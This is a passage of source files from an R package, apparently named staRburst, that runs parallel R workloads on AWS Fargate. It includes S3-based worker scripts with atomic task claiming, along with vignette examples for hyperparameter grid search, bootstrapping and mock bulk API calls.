        task$fn(x)
      }, error = function(e) {
        list(
          error = TRUE,
          message = e$message,
          value = x
        )
      })
    })

    # Check for any errors
    errors <- sapply(chunk_results, function(r) {
      is.list(r) && !is.null(r$error) && r$error
    })

    if (any(errors)) {
      first_error <- which(errors)[1]
      result <- list(
        error = TRUE,
        message = sprintf("Error in chunk item %d: %s",
                         first_error,
                         chunk_results[[first_error]]$message),
        chunk_index = task$chunk_index
      )
    } else {
      result <- list(
        error = FALSE,
        value = chunk_results,
        chunk_index = task$chunk_index
      )
    }

  } else if (!is.null(task$expr)) {
    # NEW FORMAT: Future-based execution
    message("Task loaded (Future format)")
    message("Executing task...")

    # Set up environment with globals
    exec_env <- new.env(parent = globalenv())

    # Load globals into environment
    if (!is.null(task$globals) && length(task$globals) > 0) {
      for (name in names(task$globals)) {
        assign(name, task$globals[[name]], envir = exec_env)
      }
    }

    # Load packages
    if (!is.null(task$packages)) {
      for (pkg in task$packages) {
        library(pkg, character.only = TRUE)
      }
    }

    # Evaluate expression with error handling
    result <- tryCatch({
      result_value <- eval(task$expr, envir = exec_env)
      list(
        error = FALSE,
        value = result_value,
        stdout = "",
        conditions = list()
      )
    }, error = function(e) {
      # Capture error for debugging
      list(
        error = TRUE,
        message = e$message,
        value = NULL,
        stdout = "",
        conditions = list(list(
          type = "error",
          message = e$message,
          call = deparse(e$call)
        ))
      )
    })

  } else {
    stop("Unknown task format - neither chunk nor expr found")
  }

  result
}

#' Upload result to S3
upload_result <- function(result, task_id, s3, bucket) {
  result_key <- sprintf("results/%s.qs", task_id)
  result_file <- tempfile(fileext = ".qs")

  qs2::qs_save(result, result_file)

  s3$put_object(
    Bucket = bucket,
    Key = result_key,
    Body = result_file
  )

  unlink(result_file)

  message(sprintf("Result uploaded to s3://%s/%s", bucket, result_key))
}

#' Download task from S3
download_task <- function(task_id, s3, bucket) {
  task_key <- sprintf("tasks/%s.qs", task_id)
  task_file <- tempfile(fileext = ".qs")

  s3$download_file(
    Bucket = bucket,
    Key = task_key,
    Filename = task_file
  )

  task <- qs2::qs_read(task_file)
  unlink(task_file)

  task
}

#' Try to atomically claim a task
#'
#' Returns TRUE if claimed, FALSE if race condition
try_claim_task <- function(session_id, task_id, worker_id, s3, bucket, region) {
  status_key <- sprintf("sessions/%s/tasks/%s/status.qs", session_id, task_id)

  tryCatch({
    # Get current status with ETag
    response <- s3$get_object(Bucket = bucket, Key = status_key)
    etag <- response$ETag

    # Read status
    status_file <- tempfile(fileext = ".qs")
    writeBin(response$Body, status_file)
    status <- qs2::qs_read(status_file)
    unlink(status_file)

    # Only claim if pending
    if (status$state != "pending") {
      return(FALSE)
    }

    # Attempt atomic claim
    status$state <- "claimed"
    status$claimed_at <- Sys.time()
    status$claimed_by <- worker_id

    temp_file <- tempfile(fileext = ".qs")
    qs2::qs_save(status, temp_file)

    # Conditional PUT - only succeeds if ETag matches
    s3$put_object(
      Bucket = bucket,
      Key = status_key,
      Body = temp_file,
      IfMatch = etag
    )

    unlink(temp_file)

    return(TRUE)

  }, error = function(e) {
    # Check if it's a precondition failed (another worker claimed it)
    if (grepl("PreconditionFailed|412", e$message)) {
      return(FALSE)
    }
    # Other errors - return FALSE
    return(FALSE)
  })
}

#' List pending tasks in session
list_pending_tasks <- function(session_id, s3, bucket) {
  prefix <- sprintf("sessions/%s/tasks/", session_id)

  result <- s3$list_objects_v2(
    Bucket = bucket,
    Prefix = prefix
  )

  if (length(result$Contents) == 0) {
    return(character(0))
  }

  pending_tasks <- character(0)

  for (obj in result$Contents) {
    key <- obj$Key
    if (!grepl("/status\\.qs$", key)) next

    # Extract task_id
    key_parts <- strsplit(key, "/")[[1]]
    task_id <- key_parts[4]

    # Check status
    tryCatch({
      temp_file <- tempfile(fileext = ".qs")
      s3$download_file(
        Bucket = bucket,
        Key = key,
        Filename = temp_file
      )

      status <- qs2::qs_read(temp_file)
      unlink(temp_file)

      if (status$state == "pending") {
        pending_tasks <- c(pending_tasks, task_id)
      }
    }, error = function(e) {
      # Skip on error
    })
  }

  pending_tasks
}

#' Update task status (simple version without ETag)
update_task_status_simple <- function(session_id, task_id, state, s3, bucket, region) {
  status_key <- sprintf("sessions/%s/tasks/%s/status.qs", session_id, task_id)

  tryCatch({
    temp_file <- tempfile(fileext = ".qs")
    s3$download_file(
      Bucket = bucket,
      Key = status_key,
      Filename = temp_file
    )

    status <- qs2::qs_read(temp_file)
    status$state <- state

    if (state == "running") {
      status$started_at <- Sys.time()
    }

    qs2::qs_save(status, temp_file)

    s3$put_object(
      Bucket = bucket,
      Key = status_key,
      Body = temp_file
    )

    unlink(temp_file)
  }, error = function(e) {
    message(sprintf("Failed to update status: %s", e$message))
  })
}

#' Update task status to completed
update_task_status_to_completed <- function(session_id, task_id, s3, bucket, region) {
  status_key <- sprintf("sessions/%s/tasks/%s/status.qs", session_id, task_id)

  tryCatch({
    temp_file <- tempfile(fileext = ".qs")
    s3$download_file(
      Bucket = bucket,
      Key = status_key,
      Filename = temp_file
    )

    status <- qs2::qs_read(temp_file)
    status$state <- "completed"
    status$completed_at <- Sys.time()

    qs2::qs_save(status, temp_file)

    s3$put_object(
      Bucket = bucket,
      Key = status_key,
      Body = temp_file
    )

    unlink(temp_file)
  }, error = function(e) {
    message(sprintf("Failed to update status to completed: %s", e$message))
  })
}

# Run main
main()

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)

## ----data, eval=FALSE---------------------------------------------------------
# set.seed(2024)
# 
# # Generate features
# n_samples <- 10000
# n_features <- 20
# 
# X <- matrix(rnorm(n_samples * n_features), nrow = n_samples)
# colnames(X) <- paste0("feature_", 1:n_features)
# 
# # Generate target with non-linear relationship
# true_coef <- rnorm(n_features)
# linear_pred <- X %*% true_coef
# prob <- 1 / (1 + exp(-linear_pred))
# y <- rbinom(n_samples, 1, prob)
# 
# # Create train/test split
# train_idx <- sample(1:n_samples, 0.7 * n_samples)
# X_train <- X[train_idx, ]
# y_train <- y[train_idx]
# X_test <- X[-train_idx, ]
# y_test <- y[-train_idx]
# 
# cat(sprintf("Dataset created:\n"))
# cat(sprintf("  Training samples: %s\n", format(length(y_train), big.mark = ",")))
# cat(sprintf("  Test samples: %s\n", format(length(y_test), big.mark = ",")))
# cat(sprintf("  Features: %d\n", n_features))
# cat(sprintf("  Class balance: %.1f%% / %.1f%%\n",
#             mean(y_train) * 100, (1 - mean(y_train)) * 100))

## ----grid, eval=FALSE---------------------------------------------------------
# # Define parameter space
# param_grid <- expand.grid(
#   learning_rate = c(0.01, 0.05, 0.1),
#   max_depth = c(3, 5, 7),
#   subsample = c(0.6, 0.8, 1.0),
#   min_child_weight = c(1, 3, 5),
#   stringsAsFactors = FALSE
# )
# 
# cat(sprintf("Grid search space:\n"))
# cat(sprintf("  Total parameter combinations: %d\n", nrow(param_grid)))
# cat(sprintf("  With 5-fold CV: %d model fits\n\n", nrow(param_grid) * 5))

## ----train-fn, eval=FALSE-----------------------------------------------------
# # Simple gradient boosting implementation (for demonstration)
# # In practice, use xgboost, lightgbm, or other optimized libraries
# train_gbm <- function(X, y, params, n_trees = 50) {
#   # Simplified GBM simulation
#   # This is a mock implementation - in real use, call xgboost, etc.
# 
#   n <- nrow(X)
#   pred <- rep(mean(y), n)  # Initial prediction
# 
#   # Simulate training time based on complexity
#   complexity_factor <- params$max_depth * (1 / params$learning_rate) *
#                       (1 / params$subsample)
#   training_time <- 0.001 * complexity_factor * n_trees
# 
#   Sys.sleep(min(training_time, 5))  # Cap at 5 seconds
# 
#   # Generate mock predictions with some realism
#   pred <- pred + rnorm(n, 0, 0.1)
#   pred <- pmin(pmax(pred, 0), 1)  # Bound to [0, 1]
# 
#   list(predictions = pred, params = params)
# }
# 
# # Cross-validation function
# cv_evaluate <- function(param_row, X_data, y_data, n_folds = 5) {
#   params <- as.list(param_row)
# 
#   # Create folds
#   n <- nrow(X_data)
#   fold_size <- floor(n / n_folds)
#   fold_indices <- sample(rep(1:n_folds, length.out = n))
# 
#   # Perform cross-validation
#   cv_scores <- numeric(n_folds)
# 
#   for (fold in 1:n_folds) {
#     # Split data
#     val_idx <- which(fold_indices == fold)
#     train_idx <- which(fold_indices != fold)
# 
#     X_fold_train <- X_data[train_idx, , drop = FALSE]
#     y_fold_train <- y_data[train_idx]
#     X_fold_val <- X_data[val_idx, , drop = FALSE]
#     y_fold_val <- y_data[val_idx]
# 
#     # Train model
#     model <- train_gbm(X_fold_train, y_fold_train, params)
# 
#     # Predict and evaluate (mock evaluation)
#     # In practice, compute actual predictions and metrics
#     baseline_accuracy <- mean(y_fold_val == round(mean(y_fold_train)))
# 
#     # Simulate performance improvement based on good parameters
#     param_quality <- (params$learning_rate >= 0.05) * 0.02 +
#                     (params$max_depth >= 5) * 0.02 +
#                     (params$subsample >= 0.8) * 0.01 +
#                     rnorm(1, 0, 0.02)
# 
#     accuracy <- min(baseline_accuracy + param_quality, 1.0)
#     cv_scores[fold] <- accuracy
#   }
# 
#   # Return results
#   list(
#     params = params,
#     mean_cv_score = mean(cv_scores),
#     std_cv_score = sd(cv_scores),
#     cv_scores = cv_scores
#   )
# }

## ----local, eval=FALSE--------------------------------------------------------
# # Test with 10 parameter combinations
# set.seed(999)
# sample_params <- param_grid[sample(1:nrow(param_grid), 10), ]
# 
# cat(sprintf("Running local benchmark (%d parameter combinations)...\n",
#             nrow(sample_params)))
# local_start <- Sys.time()
# 
# local_results <- lapply(1:nrow(sample_params), function(i) {
#   cv_evaluate(sample_params[i, ], X_train, y_train, n_folds = 5)
# })
# 
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "mins"))
# 
# cat(sprintf("✓ Completed in %.2f minutes\n", local_time))
# cat(sprintf("  Average time per combination: %.1f seconds\n",
#             local_time * 60 / nrow(sample_params)))
# cat(sprintf("  Estimated time for full grid (%d combinations): %.1f minutes\n",
#             nrow(param_grid), local_time * nrow(param_grid) / nrow(sample_params)))

## ----cloud, eval=FALSE--------------------------------------------------------
# n_workers <- 27  # Process ~3 parameter combinations per worker
# 
# cat(sprintf("Running grid search (%d combinations) on %d workers...\n",
#             nrow(param_grid), n_workers))
# 
# cloud_start <- Sys.time()
# 
# results <- starburst_map(
#   1:nrow(param_grid),
#   function(i) cv_evaluate(param_grid[i, ], X_train, y_train, n_folds = 5),
#   workers = n_workers,
#   cpu = 2,
#   memory = "4GB"
# )
# 
# cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "mins"))
# 
# cat(sprintf("\n✓ Completed in %.2f minutes\n", cloud_time))

## ----analysis, eval=FALSE-----------------------------------------------------
# # Extract results
# cv_scores <- sapply(results, function(x) x$mean_cv_score)
# cv_stds <- sapply(results, function(x) x$std_cv_score)
# 
# # Combine with parameters
# results_df <- cbind(param_grid,
#                    mean_score = cv_scores,
#                    std_score = cv_stds)
# 
# # Sort by performance
# results_df <- results_df[order(-results_df$mean_score), ]
# 
# cat("\n=== Grid Search Results ===\n\n")
# cat(sprintf("Total combinations evaluated: %d\n", nrow(results_df)))
# cat(sprintf("Best CV score: %.4f (± %.4f)\n",
#             results_df$mean_score[1], results_df$std_score[1]))
# 
# cat("\n=== Best Hyperparameters ===\n")
# cat(sprintf("  Learning rate: %.3f\n", results_df$learning_rate[1]))
# cat(sprintf("  Max depth: %d\n", results_df$max_depth[1]))
# cat(sprintf("  Subsample: %.2f\n", results_df$subsample[1]))
# cat(sprintf("  Min child weight: %d\n", results_df$min_child_weight[1]))
# 
# cat("\n=== Top 5 Parameter Combinations ===\n")
# for (i in 1:5) {
#   cat(sprintf("\n%d. Score: %.4f (± %.4f)\n", i,
#               results_df$mean_score[i], results_df$std_score[i]))
#   cat(sprintf("   lr=%.3f, depth=%d, subsample=%.2f, min_child=%d\n",
#               results_df$learning_rate[i],
#               results_df$max_depth[i],
#               results_df$subsample[i],
#               results_df$min_child_weight[i]))
# }
# 
# # Parameter importance analysis
# cat("\n=== Parameter Impact Analysis ===\n")
# for (param in c("learning_rate", "max_depth", "subsample", "min_child_weight")) {
#   param_means <- aggregate(mean_score ~ get(param),
#                           data = results_df, FUN = mean)
#   names(param_means)[1] <- param
# 
#   cat(sprintf("\n%s:\n", param))
#   for (i in 1:nrow(param_means)) {
#     cat(sprintf("  %s: %.4f\n",
#                 param_means[i, 1],
#                 param_means[i, 2]))
#   }
# }
# 
# # Visualize results (if in interactive session)
# if (interactive()) {
#   # Score distribution
#   hist(results_df$mean_score,
#        breaks = 20,
#        main = "Distribution of Cross-Validation Scores",
#        xlab = "Mean CV Score",
#        col = "lightblue",
#        border = "white")
#   abline(v = results_df$mean_score[1], col = "red", lwd = 2, lty = 2)
# 
#   # Learning rate effect
#   boxplot(mean_score ~ learning_rate, data = results_df,
#           main = "Learning Rate Impact",
#           xlab = "Learning Rate",
#           ylab = "CV Score",
#           col = "lightgreen")
# }

## ----random-search, eval=FALSE------------------------------------------------
# # Generate random parameter combinations
# n_random <- 100
# 
# random_params <- data.frame(
#   learning_rate = runif(n_random, 0.001, 0.3),
#   max_depth = sample(2:10, n_random, replace = TRUE),
#   subsample = runif(n_random, 0.5, 1.0),
#   min_child_weight = sample(1:10, n_random, replace = TRUE),
#   stringsAsFactors = FALSE
# )
# 
# cat(sprintf("Running random search (%d combinations)...\n", n_random))
# 
# random_results <- starburst_map(
#   1:nrow(random_params),
#   function(i) cv_evaluate(random_params[i, ], X_train, y_train, n_folds = 5),
#   workers = 33,
#   cpu = 2,
#   memory = "4GB"
# )
# 
# # Find best parameters
# random_scores <- sapply(random_results, function(x) x$mean_cv_score)
# best_idx <- which.max(random_scores)
# 
# cat("\nBest random search result:\n")
# cat(sprintf("  Score: %.4f\n", random_scores[best_idx]))
# cat(sprintf("  Learning rate: %.4f\n", random_params$learning_rate[best_idx]))
# cat(sprintf("  Max depth: %d\n", random_params$max_depth[best_idx]))

## ----bayesian, eval=FALSE-----------------------------------------------------
# # Bayesian optimization would involve:
# # 1. Evaluate a small initial set (e.g., 10 combinations)
# # 2. Fit a Gaussian process to predict performance
# # 3. Use acquisition function to select next promising points
# # 4. Evaluate new points in parallel
# # 5. Repeat until convergence
# 
# # This requires specialized packages like mlrMBO or rBayesianOptimization
# # but can be parallelized with starburst for the evaluation step

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/grid-search.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/grid-search.R", package = "starburst"))

#!/usr/bin/env Rscript
#
# Parallel Bulk API Calls Example
#
# This script demonstrates parallel API calls using staRburst.
# It fetches data for 1,000 companies using a mock API.
#
# Usage:
#   Rscript api-calls.R
#   # or from R:
#   source(system.file("examples/api-calls.R", package = "starburst"))

library(starburst)

cat("=== Parallel Bulk API Calls Example ===\n\n")

# Mock API function (simulates real API with delays)
fetch_company_data_mock <- function(ticker) {
  # Simulate network latency
  Sys.sleep(runif(1, 0.2, 0.8))

  # Simulate occasional failures (5% rate)
  if (runif(1) < 0.05) {
    return(list(
      ticker = ticker,
      success = FALSE,
      error = "API timeout",
      timestamp = Sys.time()
    ))
  }

  # Generate mock data
  list(
    ticker = ticker,
    success = TRUE,
    company_name = paste("Company", ticker),
    market_cap = round(rnorm(1, 50e9, 20e9), 0),
    pe_ratio = round(rnorm(1, 25, 10), 2),
    revenue = round(rnorm(1, 10e9, 5e9), 0),
    employees = round(rnorm(1, 50000, 20000), 0),
    sector = sample(c("Technology", "Healthcare", "Finance", "Energy"), 1),
    timestamp = Sys.time()
  )
}

# Generate mock ticker symbols
set.seed(123)
n_companies <- 1000
tickers <- paste0(
  sample(LETTERS, n_companies, replace = TRUE),
  sample(LETTERS, n_companies, replace = TRUE),
  sample(LETTERS, n_companies, replace = TRUE)
)

cat(sprintf("Generated %d company tickers\n\n", n_companies))

# Local benchmark (50 calls)
cat("Running local benchmark (50 API calls)...\n")
local_start <- Sys.time()
local_results <- lapply(head(tickers, 50), fetch_company_data_mock)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("✓ Completed in %.1f seconds\n", local_time))
cat(sprintf("  Estimated time for %d: %.1f minutes\n\n",
            n_companies, local_time * n_companies / 50 / 60))

# Cloud execution
n_workers <- 25

cat(sprintf("Fetching data for %d companies on %d workers...\n",
            n_companies, n_workers))

cloud_start <- Sys.time()
results <- starburst_map(
  tickers,
  fetch_company_data_mock,
  workers = n_workers,
  cpu = 1,
  memory = "2GB"
)
cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "mins"))

cat(sprintf("\n✓ Completed in %.2f minutes\n\n", cloud_time))

# Process results into data frame
results_df <- do.call(rbind, lapply(results, function(x) {
  if (x$success) {
    data.frame(
      ticker = x$ticker,
      company_name = x$company_name,
      market_cap = x$market_cap,
      pe_ratio = x$pe_ratio,
      revenue = x$revenue,
      employees = x$employees,
      sector = x$sector,
      success = TRUE,
      error = NA,
      stringsAsFactors = FALSE
    )
  } else {
    data.frame(
      ticker = x$ticker,
      company_name = NA,
      market_cap = NA,
      pe_ratio = NA,
      revenue = NA,
      employees = NA,
      sector = NA,
      success = FALSE,
      error = x$error,
      stringsAsFactors = FALSE
    )
  }
}))

# Print summary
cat("=== Results Summary ===\n\n")
success_rate <- mean(results_df$success) * 100
cat(sprintf("Total companies: %d\n", nrow(results_df)))
cat(sprintf("Successful fetches: %d (%.1f%%)\n",
            sum(results_df$success), success_rate))
cat(sprintf("Failed fetches: %d\n\n", sum(!results_df$success)))

# Sample results
cat("=== Sample Results ===\n\n")
successful <- results_df[results_df$success, ]
print(head(successful[, c("ticker", "company_name", "sector", "market_cap")], 10))

# Sector distribution
cat("\n=== Sector Distribution ===\n\n")
sector_table <- table(results_df$sector)
print(sector_table)

# Market cap statistics
cat("\n=== Market Cap Statistics ===\n\n")
cat(sprintf("Mean: $%.2fB\n",
            mean(results_df$market_cap, na.rm = TRUE) / 1e9))
cat(sprintf("Median: $%.2fB\n",
            median(results_df$market_cap, na.rm = TRUE) / 1e9))
cat(sprintf("Range: $%.2fB - $%.2fB\n",
            min(results_df$market_cap, na.rm = TRUE) / 1e9,
            max(results_df$market_cap, na.rm = TRUE) / 1e9))

# Performance comparison
cat("\n=== Performance Comparison ===\n\n")
estimated_local_time <- local_time * n_companies / 50 / 60
speedup <- estimated_local_time / cloud_time
cat(sprintf("Local (estimated): %.1f minutes\n", estimated_local_time))
cat(sprintf("Cloud (%d workers): %.2f minutes\n", n_workers, cloud_time))
cat(sprintf("Speedup: %.1fx\n", speedup))

# Save results (optional)
if (interactive()) {
  save_results <- readline("Save results to CSV? (y/n): ")
  if (tolower(save_results) == "y") {
    write.csv(results_df, "company_data.csv", row.names = FALSE)
    cat("Results saved to company_data.csv\n")
  }
}

cat("\n✓ Done!\n")

#!/usr/bin/env Rscript

# staRburst Worker Script for Future Backend
# This script runs inside Fargate containers to execute Future tasks

main <- function() {
  # Get configuration from environment variables
  task_id <- Sys.getenv("TASK_ID")
  bucket <- Sys.getenv("S3_BUCKET")
  region <- Sys.getenv("AWS_DEFAULT_REGION", "us-east-1")

  if (task_id == "" || bucket == "") {
    stop("Missing required environment variables: TASK_ID, S3_BUCKET")
  }

  message(sprintf("Worker starting for task: %s", task_id))

  tryCatch({
    # Load required packages
    library(paws.storage)
    library(qs2)

    # Create S3 client
    s3 <- paws.storage::s3(config = list(region = region))

    # Download task from S3
    task_key <- sprintf("tasks/%s.qs", task_id)
    task_file <- tempfile(fileext = ".qs")

    message(sprintf("Downloading task from s3://%s/%s", bucket, task_key))

    s3$download_file(
      Bucket = bucket,
      Key = task_key,
      Filename = task_file
    )

    # Load task data
    task_data <- qs2::qs_read(task_file)
    unlink(task_file)

    message("Task loaded, executing...")

    # Set up environment with globals
    exec_env <- new.env(parent = globalenv())

    # Load globals into environment
    if (!is.null(task_data$globals) && length(task_data$globals) > 0) {
      for (name in names(task_data$globals)) {
        assign(name, task_data$globals[[name]], envir = exec_env)
      }
    }

    # Load packages
    if (!is.null(task_data$packages)) {
      for (pkg in task_data$packages) {
        library(pkg, character.only = TRUE)
      }
    }

    # Evaluate expression in the environment
    result_value <- eval(task_data$expr, envir = exec_env)

    message("Task completed, uploading result...")

    # Create result object
    result <- list(
      error = FALSE,
      value = result_value,
      stdout = "",
      conditions = list()
    )

    # Upload result to S3
    result_key <- sprintf("results/%s.qs", task_id)
    result_file <- tempfile(fileext = ".qs")

    qs2::qs_save(result, result_file)

    s3$put_object(
      Bucket = bucket,
      Key = result_key,
      Body = result_file
    )

    unlink(result_file)

    message(sprintf("Result uploaded to s3://%s/%s", bucket, result_key))
    message("Worker completed successfully")

    quit(status = 0)

  }, error = function(e) {
    message(sprintf("Worker failed: %s", e$message))
    message(sprintf("Traceback: %s", paste(capture.output(traceback()), collapse = "\n")))

    # Try to upload error result
    tryCatch({
      library(paws.storage)
      library(qs2)

      s3 <- paws.storage::s3(config = list(region = region))

      error_result <- list(
        error = TRUE,
        message = e$message,
        traceback = capture.output(traceback()),
        value = NULL,
        stdout = "",
        conditions = list(simpleError(e$message))
      )

      result_key <- sprintf("results/%s.qs", task_id)
      result_file <- tempfile(fileext = ".qs")

      qs2::qs_save(error_result, result_file)

      s3$put_object(
        Bucket = bucket,
        Key = result_key,
        Body = result_file
      )

      unlink(result_file)

      message("Error result uploaded")
    }, error = function(e2) {
      message(sprintf("Failed to upload error result: %s", e2$message))
    })

    quit(status = 1)
  })
}

# Run main function
main()

## ----setup, include = FALSE---------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>",
  eval = FALSE
)

## -----------------------------------------------------------------------------
# # Install from GitHub
# remotes::install_github("yourname/starburst")

## -----------------------------------------------------------------------------
# library(starburst)
# 
# # Interactive setup wizard (takes ~2 minutes)
# starburst_setup()

## -----------------------------------------------------------------------------
# library(furrr)
# library(starburst)
# 
# # Define your work
# expensive_simulation <- function(i) {
#   # Some computation that takes a few minutes
#   results <- replicate(1000, {
#     x <- rnorm(10000)
#     mean(x^2)
#   })
#   mean(results)
# }
# 
# # Local execution (single core)
# plan(sequential)
# system.time({
#   results_local <- future_map(1:100, expensive_simulation)
# })
# #> ~16 minutes on typical laptop
# 
# # Cloud execution (50 workers)
# plan(future_starburst, workers = 50)
# system.time({
#   results_cloud <- future_map(1:100, expensive_simulation)
# })
# #> ~2 minutes (including 45s startup)
# #> Cost: ~$0.85
# 
# # Results are identical
# identical(results_local, results_cloud)
# #> [1] TRUE

## -----------------------------------------------------------------------------
# library(starburst)
# library(furrr)
# 
# # Simulate portfolio returns
# simulate_portfolio <- function(seed) {
#   set.seed(seed)
# 
#   # Random walk for 252 trading days
#   returns <- rnorm(252, mean = 0.0003, sd = 0.02)
#   prices <- cumprod(1 + returns)
# 
#   list(
#     final_value = prices[252],
#     max_drawdown = max(cummax(prices) - prices) / max(prices),
#     sharpe_ratio = mean(returns) / sd(returns) * sqrt(252)
#   )
# }
# 
# # Run 10,000 simulations on 100 workers
# plan(future_starburst, workers = 100)
# 
# results <- future_map(1:10000, simulate_portfolio, .options = furrr_options(seed = TRUE))
# 
# # Analyze results
# final_values <- sapply(results, `[[`, "final_value")
# hist(final_values, breaks = 50, main = "Distribution of Portfolio Final Values")
# 
# # 95% confidence interval
# quantile(final_values, c(0.025, 0.975))

## -----------------------------------------------------------------------------
# library(starburst)
# library(furrr)
# 
# # Your data
# data <- read.csv("my_data.csv")
# 
# # Bootstrap function
# bootstrap_regression <- function(i, data) {
#   # Resample with replacement
#   boot_indices <- sample(nrow(data), replace = TRUE)
#   boot_data <- data[boot_indices, ]
# 
#   # Fit model
#   model <- lm(y ~ x1 + x2 + x3, data = boot_data)
# 
#   # Return coefficients
#   coef(model)
# }
# 
# # Run 10,000 bootstrap samples
# plan(future_starburst, workers = 50)
# 
# boot_results <- future_map(1:10000, bootstrap_regression, data = data)
# 
# # Convert to matrix
# boot_coefs <- do.call(rbind, boot_results)
# 
# # 95% confidence intervals for each coefficient
# apply(boot_coefs, 2, quantile, probs = c(0.025, 0.975))

## -----------------------------------------------------------------------------
# library(starburst)
# library(furrr)
# 
# # Process one sample
# process_sample <- function(sample_id) {
#   # Read from S3 (data already in cloud)
#   fastq_path <- sprintf("s3://my-genomics-data/samples/%s.fastq", sample_id)
#   data <- read_fastq(fastq_path)
# 
#   # Align reads
#   aligned <- align_reads(data, reference = "hg38")
# 
#   # Call variants
#   variants <- call_variants(aligned)
# 
#   # Return summary
#   list(
#     sample_id = sample_id,
#     num_variants = nrow(variants),
#     variants = variants
#   )
# }
# 
# # Process 1000 samples on 100 workers
# sample_ids <- list.files("s3://my-genomics-data/samples/", pattern = ".fastq$")
# 
# plan(future_starburst, workers = 100)
# 
# results <- future_map(sample_ids, process_sample, .progress = TRUE)
# 
# # Combine results
# all_variants <- do.call(rbind, lapply(results, `[[`, "variants"))

## -----------------------------------------------------------------------------
# plan(future_starburst, workers = 50)
# 
# results <- future_map(file_list, function(file) {
#   # Workers read directly from S3
#   data <- read.csv(sprintf("s3://my-bucket/%s", file))
#   process(data)
# })

## -----------------------------------------------------------------------------
# # Load data locally
# data <- read.csv("local_file.csv")
# 
# # staRburst automatically uploads to S3 and distributes
# plan(future_starburst, workers = 50)
# 
# results <- future_map(1:1000, function(i) {
#   # Each worker gets a copy of 'data'
#   bootstrap_analysis(data, i)
# })

## -----------------------------------------------------------------------------
# # Upload once
# large_data <- read.csv("huge_file.csv")
# s3_path <- starburst_upload(large_data, "s3://my-bucket/large_data.rds")
# 
# # Workers read from S3
# plan(future_starburst, workers = 100)
# 
# results <- future_map(1:1000, function(i) {
#   # Read from S3 inside worker
#   data <- readRDS(s3_path)
#   process(data, i)
# })

## -----------------------------------------------------------------------------
# # Check cost before running
# plan(future_starburst, workers = 100, cpu = 4, memory = "8GB")
# #> Estimated cost: ~$3.50/hour

## -----------------------------------------------------------------------------
# # Set maximum cost per job
# starburst_config(
#   max_cost_per_job = 10,      # Don't start jobs that would cost >$10
#   cost_alert_threshold = 5     # Warn when approaching $5
# )
# 
# # Now jobs exceeding limit will error before starting
# plan(future_starburst, workers = 1000)  # Would cost ~$35/hour
# #> Error: Estimated cost ($35/hr) exceeds limit ($10/hr)

## -----------------------------------------------------------------------------
# plan(future_starburst, workers = 50)
# 
# results <- future_map(data, process)
# 
# #> Cluster runtime: 23 minutes
# #> Total cost: $1.34

## -----------------------------------------------------------------------------
# starburst_quota_status()
# #> Fargate vCPU Quota: 100 / 100 used
# #> Allows: ~25 workers with 4 vCPUs each
# #>
# #> Recommended: Request increase to 500 vCPUs

## -----------------------------------------------------------------------------
# starburst_request_quota_increase(vcpus = 500)
# #> Requesting Fargate vCPU quota increase:
# #>   Current: 100 vCPUs
# #>   Requested: 500 vCPUs
# #>
# #> ✓ Quota increase requested (Case ID: 12345678)
# #> ✓ AWS typically approves within 1-24 hours

## -----------------------------------------------------------------------------
# # Quota allows 25 workers, but you request 100
# plan(future_starburst, workers = 100, cpu = 4)
# 
# #> ⚠ Requested: 100 workers (400 vCPUs)
# #> ⚠ Current quota: 100 vCPUs (allows 25 workers max)
# #>
# #> 📋 Execution plan:
# #>   • Running in 4 waves of 25 workers each
# #>
# #> 💡 Request quota increase to 500 vCPUs? [y/n]: y
# #>
# #> ✓ Quota increase requested
# #> ⚡ Starting wave 1 (25 workers)...
# 
# results <- future_map(1:1000, expensive_function)
# 
# #> ⚡ Wave 1: 100% complete (250 tasks)
# #> ⚡ Wave 2: 100% complete (500 tasks)
# #> ⚡ Wave 3: 100% complete (750 tasks)
# #> ⚡ Wave 4: 100% complete (1000 tasks)

## -----------------------------------------------------------------------------
# # View logs from most recent cluster
# starburst_logs()
# 
# # View logs from specific task
# starburst_logs(task_id = "abc-123")
# 
# # View last 100 log lines
# starburst_logs(last_n = 100)

## -----------------------------------------------------------------------------
# starburst_status()
# #> Active Clusters:
# #>   • starburst-xyz123: 50 workers running
# #>   • starburst-abc456: 25 workers running

## -----------------------------------------------------------------------------
# # Rebuild environment
# starburst_rebuild_environment()

## -----------------------------------------------------------------------------
# # Check logs
# starburst_logs(task_id = "failed-task-id")
# 
# # Often due to memory limits - increase worker memory
# plan(future_starburst, workers = 50, memory = "16GB")  # Default is 8GB

## -----------------------------------------------------------------------------
# # Use Arrow for data frames
# library(arrow)
# write_parquet(my_data, "s3://bucket/data.parquet")
# 
# # Workers read Arrow
# results <- future_map(1:100, function(i) {
#   data <- read_parquet("s3://bucket/data.parquet")
#   process(data, i)
# })

## -----------------------------------------------------------------------------
# # 100 tasks, each takes 10 minutes
# # Local: 1000 minutes, Cloud: ~10 minutes

## -----------------------------------------------------------------------------
# # 10000 tasks, each takes 30 seconds
# # Startup overhead (45s) dominates

## -----------------------------------------------------------------------------
# # 10,000 tiny tasks
# results <- future_map(1:10000, small_function)

## -----------------------------------------------------------------------------
# # 100 batches of 100 tasks each
# batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))
# 
# results <- future_map(batches, function(batch) {
#   lapply(batch, small_function)
# })
# 
# # Flatten results
# results <- unlist(results, recursive = FALSE)

## -----------------------------------------------------------------------------
# big_data <- read.csv("10GB_file.csv")  # Upload for every task
# results <- future_map(1:1000, function(i) process(big_data, i))

## -----------------------------------------------------------------------------
# # Upload once to S3
# s3_path <- "s3://bucket/big_data.csv"
# write.csv(big_data, s3_path)
# 
# # Workers read from S3
# results <- future_map(1:1000, function(i) {
#   data <- read.csv(s3_path)
#   process(data, i)
# })

## -----------------------------------------------------------------------------
# starburst_config(
#   max_cost_per_job = 50,           # Prevent accidents
#   cost_alert_threshold = 25        # Get warned early
# )

## -----------------------------------------------------------------------------
# # staRburst auto-cleans, but you can force it
# plan(sequential)  # Switch back to local
